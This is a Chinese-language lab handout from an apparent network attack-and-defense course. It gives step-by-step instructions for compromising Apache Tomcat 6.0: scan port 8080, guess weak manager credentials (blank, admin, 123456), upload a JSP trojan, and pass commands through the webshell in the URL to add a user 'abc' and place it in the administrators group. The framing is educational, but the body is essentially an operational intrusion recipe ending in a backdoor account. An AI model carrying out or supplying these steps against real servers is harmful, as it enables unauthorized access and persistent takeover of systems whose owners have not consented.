第2个实验 Tomcat6.0的漏洞攻击1(网络攻防教程)

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验二Tomcat6.0的漏洞攻击

【实验目的】

通过端口扫描工具扫描8080端口,猜测弱口令:空admin 。

【实验环境】

系统环境:Windows2003及以上操作系统

软件工具:scanport

【实验内容】

1.使用Scanport工具扫描8080端口;

2.扫描后,得到一些主机IP,选中其中一台,例如:172.16.28.242

然后在地址栏中,进行这样的访问:

http://172.16.28.242:8080/manager/html

如果跳出登录窗口,请输入用户名:admin 密码:空或admin

或123456;

3.如果第2步登录成功,上传老师给的JSP木马。

4.在网址中利用命令,格式如下:

查看用户

http://172.16.28.242:8080/index1/index.jsp?cmd=net user

新建用户:

http://172.16.28.242:8080/index1/index.jsp?cmd=net user abc 123456 /add 升为超级管理员:

http://172.16.28.242:8080/index1/index.jsp?cmd=net localgroup

administrators abc /add

相关文档
最新文档